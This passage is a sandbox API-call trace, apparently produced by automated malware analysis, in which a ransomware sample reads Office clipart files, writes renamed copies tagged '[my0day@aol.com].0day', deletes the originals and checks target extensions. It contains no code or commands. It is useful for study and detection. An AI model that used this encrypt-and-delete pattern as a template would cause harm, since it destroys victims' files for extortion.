Office\\CLIPART\\PUB60COR\\DD01585_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01585_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x37c [0274.856] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0274.856] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0274.856] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01585_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x390 [0274.856] GetLastError () returned 0x0 [0274.856] ReadFile (in: hFile=0x37c, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fafed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2fafed4*=0x9dc, lpOverlapped=0x0) returned 1 [0274.898] WriteFile (in: hFile=0x390, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x9e0, lpNumberOfBytesWritten=0x2fafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2fafc9c*=0x9e0, lpOverlapped=0x0) returned 1 [0274.899] ReadFile (in: hFile=0x37c, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fafed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2fafed4*=0x0, lpOverlapped=0x0) returned 1 [0274.899] WriteFile (in: hFile=0x390, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2fafc9c*=0xec, lpOverlapped=0x0) returned 1 [0274.899] SetEndOfFile (hFile=0x390) returned 1 [0274.899] CloseHandle (hObject=0x390) returned 1 [0274.899] SetFilePointerEx (in: hFile=0x37c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0274.899] SetEndOfFile (hFile=0x37c) returned 1 [0274.901] CloseHandle (hObject=0x37c) returned 1 [0274.901] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0274.956] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01585_.wmf")) returned 1 [0274.968] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF") returned 63 [0274.968] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF") returned 63 [0274.968] lstrlenW (lpString=".doc") returned 4 [0274.968] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0274.968] lstrlenW (lpString=".docx") returned 5 [0274.968] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0274.968] lstrlenW (lpString=".pdf") returned 4 [0274.968] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0274.968] lstrlenW (lpString=".xls") returned 4 [0274.968] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0274.968] lstrlenW (lpString=".xlsx") returned 5 [0274.968] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0274.968] lstrlenW (lpString=".ppt") returned 4 [0274.968] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0274.968] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF") returned 63 [0274.968] lstrlenW (lpString=".zip") returned 4 [0274.968] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0274.968] lstrlenW (lpString=".rar") returned 4 [0274.968] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0274.968] lstrlenW (lpString=".bz2") returned 4 [0274.969] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0274.969] lstrlenW (lpString=".7z") returned 3 [0274.969] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0274.969] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF") returned 63 [0274.969] lstrlenW (lpString=".dbf") returned 4 [0274.969] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0274.969] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF") returned 63 [0274.969] lstrlenW (lpString=".1cd") returned 4 [0274.969] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0274.969] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF") returned 63 [0274.969] lstrlenW (lpString=".jpg") returned 4 [0274.969] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0274.969] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF") returned 63 [0274.969] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF") returned 63 [0274.969] lstrlenW (lpString=".doc") returned 4 [0274.969] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0274.969] lstrlenW (lpString=".docx") returned 5 [0274.969] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0274.969] lstrlenW (lpString=".pdf") returned 4 [0274.969] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0274.969] lstrlenW (lpString=".xls") returned 4 [0274.969] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0274.969] lstrlenW (lpString=".xlsx") returned 5 [0274.969] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0274.969] lstrlenW (lpString=".ppt") returned 4 [0274.969] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0274.969] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF") returned 63 [0274.969] lstrlenW (lpString=".zip") returned 4 [0274.969] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0274.969] lstrlenW (lpString=".rar") returned 4 [0274.969] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0274.969] lstrlenW (lpString=".bz2") returned 4 [0274.969] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0274.969] lstrlenW (lpString=".7z") returned 3 [0274.969] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0274.970] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF") returned 63 [0274.970] lstrlenW (lpString=".dbf") returned 4 [0274.970] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0274.970] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF") returned 63 [0274.970] lstrlenW (lpString=".1cd") returned 4 [0274.970] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0274.970] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01585_.WMF") returned 63 [0274.970] lstrlenW (lpString=".jpg") returned 4 [0274.970] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0274.970] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0274.970] lstrlenW (lpString="DD01629_.WMF") returned 12 [0274.970] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01629_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01629_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0274.970] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x2faff1c | out: lpFileSize=0x2faff1c*=580) returned 1 [0274.970] CloseHandle (hObject=0x378) returned 1 [0274.970] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01629_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01629_.wmf")) returned 0x20 [0274.970] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01629_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01629_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0274.970] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01629_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01629_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0274.971] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0274.971] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0274.971] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01629_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01629_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0274.971] GetLastError () returned 0x0 [0274.971] ReadFile (in: hFile=0x378, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fafed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2fafed4*=0x244, lpOverlapped=0x0) returned 1 [0274.972] WriteFile (in: hFile=0x2c4, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x250, lpNumberOfBytesWritten=0x2fafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2fafc9c*=0x250, lpOverlapped=0x0) returned 1 [0274.973] ReadFile (in: hFile=0x378, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fafed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2fafed4*=0x0, lpOverlapped=0x0) returned 1 [0274.973] WriteFile (in: hFile=0x2c4, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2fafc9c*=0xec, lpOverlapped=0x0) returned 1 [0274.973] SetEndOfFile (hFile=0x2c4) returned 1 [0274.973] CloseHandle (hObject=0x2c4) returned 1 [0274.973] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0274.973] SetEndOfFile (hFile=0x378) returned 1 [0274.975] CloseHandle (hObject=0x378) returned 1 [0274.976] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01629_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0274.976] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01629_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01629_.wmf")) returned 1 [0274.976] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01629_.WMF") returned 63 [0274.976] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01629_.WMF") returned 63 [0274.976] lstrlenW (lpString=".doc") returned 4 [0274.976] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0274.976] lstrlenW (lpString=".docx") returned 5 [0274.976] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0274.976] lstrlenW (lpString=".pdf") returned 4 [0274.976] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0274.976] lstrlenW (lpString=".xls") returned 4 [0274.976] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0274.976] lstrlenW (lpString=".xlsx") returned 5 [0274.976] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0274.976] lstrlenW (lpString=".ppt") returned 4 [0274.976] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0274.976] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01629_.WMF") returned 63 [0274.976] lstrlenW (lpString=".zip") returned 4 [0274.976] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0274.976] lstrlenW (lpString=".rar") returned 4 [0274.976] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0274.976] lstrlenW (lpString=".bz2") returned 4 [0274.976] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0274.976] lstrlenW (lpString=".7z") returned 3 [0274.976] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0274.977] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01629_.WMF") returned 63 [0274.977] lstrlenW (lpString=".dbf") returned 4 [0274.977] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0274.977] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01629_.WMF") returned 63 [0274.977] lstrlenW (lpString=".1cd") returned 4 [0274.977] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0274.977] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01629_.WMF") returned 63 [0274.977] lstrlenW (lpString=".jpg") returned 4 [0274.977] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0274.977] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01629_.WMF") returned 63 [0274.977] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01629_.WMF") returned 63 [0274.977] lstrlenW (lpString=".doc") returned 4 [0274.977] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0274.977] lstrlenW (lpString=".docx") returned 5 [0274.977] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0274.977] lstrlenW (lpString=".pdf") returned 4 [0274.977] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0274.977] lstrlenW (lpString=".xls") returned 4 [0274.977] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0274.977] lstrlenW (lpString=".xlsx") returned 5 [0274.977] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0274.977] lstrlenW (lpString=".ppt") returned 4 [0274.977] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0274.977] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01629_.WMF") returned 63 [0274.977] lstrlenW (lpString=".zip") returned 4 [0274.977] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0274.977] lstrlenW (lpString=".rar") returned 4 [0274.977] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0274.977] lstrlenW (lpString=".bz2") returned 4 [0274.977] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0274.977] lstrlenW (lpString=".7z") returned 3 [0274.977] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0274.977] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01629_.WMF") returned 63 [0274.977] lstrlenW (lpString=".dbf") returned 4 [0274.977] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0274.977] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01629_.WMF") returned 63 [0274.978] lstrlenW (lpString=".1cd") returned 4 [0274.978] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0274.978] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01629_.WMF") returned 63 [0274.978] lstrlenW (lpString=".jpg") returned 4 [0274.978] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0274.978] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0274.978] lstrlenW (lpString="DD01630_.WMF") returned 12 [0274.978] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01630_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01630_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0274.978] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x2faff1c | out: lpFileSize=0x2faff1c*=296) returned 1 [0274.978] CloseHandle (hObject=0x378) returned 1 [0274.978] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01630_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01630_.wmf")) returned 0x20 [0274.978] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01630_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01630_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0274.978] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01630_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01630_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0274.978] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0274.978] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0274.979] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01630_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01630_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c4 [0274.979] GetLastError () returned 0x0 [0274.979] ReadFile (in: hFile=0x378, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fafed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2fafed4*=0x128, lpOverlapped=0x0) returned 1 [0274.980] WriteFile (in: hFile=0x2c4, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0x130, lpNumberOfBytesWritten=0x2fafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2fafc9c*=0x130, lpOverlapped=0x0) returned 1 [0274.981] ReadFile (in: hFile=0x378, lpBuffer=0x3810020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2fafed4, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesRead=0x2fafed4*=0x0, lpOverlapped=0x0) returned 1 [0274.981] WriteFile (in: hFile=0x2c4, lpBuffer=0x3810020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2fafc9c, lpOverlapped=0x0 | out: lpBuffer=0x3810020*, lpNumberOfBytesWritten=0x2fafc9c*=0xec, lpOverlapped=0x0) returned 1 [0274.981] SetEndOfFile (hFile=0x2c4) returned 1 [0274.981] CloseHandle (hObject=0x2c4) returned 1 [0274.981] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0274.981] SetEndOfFile (hFile=0x378) returned 1 [0274.984] CloseHandle (hObject=0x378) returned 1 [0274.984] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01630_.WMF.id-9C354B42.[my0day@aol.com].0day", dwFileAttributes=0x20) returned 1 [0274.984] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01630_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01630_.wmf")) returned 1 [0274.985] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01630_.WMF") returned 63 [0274.985] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01630_.WMF") returned 63 [0274.985] lstrlenW (lpString=".doc") returned 4 [0274.985] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0274.985] lstrlenW (lpString=".docx") returned 5 [0274.985] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0274.985] lstrlenW (lpString=".pdf") returned 4 [0274.985] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0274.985] lstrlenW (lpString=".xls") returned 4 [0274.985] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0274.985] lstrlenW (lpString=".xlsx") returned 5 [0274.985] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0274.985] lstrlenW (lpString=".ppt") returned 4 [0274.985] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0274.985] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01630_.WMF") returned 63 [0274.985] lstrlenW (lpString=".zip") returned 4 [0274.985] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0274.985] lstrlenW (lpString=".rar") returned 4 [0274.985] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0274.985] lstrlenW (lpString=".bz2") returned 4 [0274.985] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0274.985] lstrlenW (lpString=".7z") returned 3 [0274.985] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0274.985] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01630_.WMF") returned 63 [0274.985] lstrlenW (lpString=".dbf") returned 4 [0274.985] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0274.985] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01630_.WMF") returned 63 [0274.985] lstrlenW (lpString=".1cd") returned 4 [0274.986] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0274.986] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01630_.WMF") returned 63 [0274.986] lstrlenW (lpString=".jpg") returned 4 [0274.986] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0274.986] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01630_.WMF") returned 63 [0274.986] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01630_.WMF") returned 63 [0274.986] lstrlenW (lpString=".doc") returned 4 [0274.986] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0274.986] lstrlenW (lpString=".docx") returned 5 [0274.986] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0274.986] lstrlenW (lpString=".pdf") returned 4 [0274.986] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0274.986] lstrlenW (lpString=".xls") returned 4 [0274.986] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0274.986] lstrlenW (lpString=".xlsx") returned 5 [0274.986] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0274.986] lstrlenW (lpString=".ppt") returned 4 [0274.986] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0274.986] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01630_.WMF") returned 63 [0274.986] lstrlenW (lpString=".zip") returned 4 [0274.986] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0274.986] lstrlenW (lpString=".rar") returned 4 [0274.986] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0274.986] lstrlenW (lpString=".bz2") returned 4 [0274.986] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0274.986] lstrlenW (lpString=".7z") returned 3 [0274.986] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0274.986] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01630_.WMF") returned 63 [0274.986] lstrlenW (lpString=".dbf") returned 4 [0274.986] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0274.986] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01630_.WMF") returned 63 [0274.986] lstrlenW (lpString=".1cd") returned 4 [0274.986] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0274.986] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01630_.WMF") returned 63 [0274.986] lstrlenW (lpString=".jpg") returned 4 [0274.986] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0274.987] lstrcmpiW (lpString1=".WMF", lpString2=".0day") returned 1 [0274.987] lstrlenW (lpString="DD01631_.WMF") returned 12 [0274.987] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01631_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01631_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0274.987] GetFileSizeEx (in: hFile=0x378, lpFileSize=0x2faff1c | out: lpFileSize=0x2faff1c*=552) returned 1 [0274.987] CloseHandle (hObject=0x378) returned 1 [0274.987] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01631_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01631_.wmf")) returned 0x20 [0274.987] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01631_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01631_.wmf.id-9c354b42.[my0day@aol.com].0day")) returned 0xffffffff [0274.987] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01631_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01631_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x378 [0274.987] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0274.987] SetFilePointerEx (in: hFile=0x378, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2fafec8 | out: lpNewFilePointer=0x0) returned 1 [0274.987] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\DD01631_.WMF.id-9C354B42.[my0day@aol.com].0day" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\dd01631_.wmf.id-9c354b42.[my0day@aol.com].0day"), dwDesiredAccess=0x40000000, 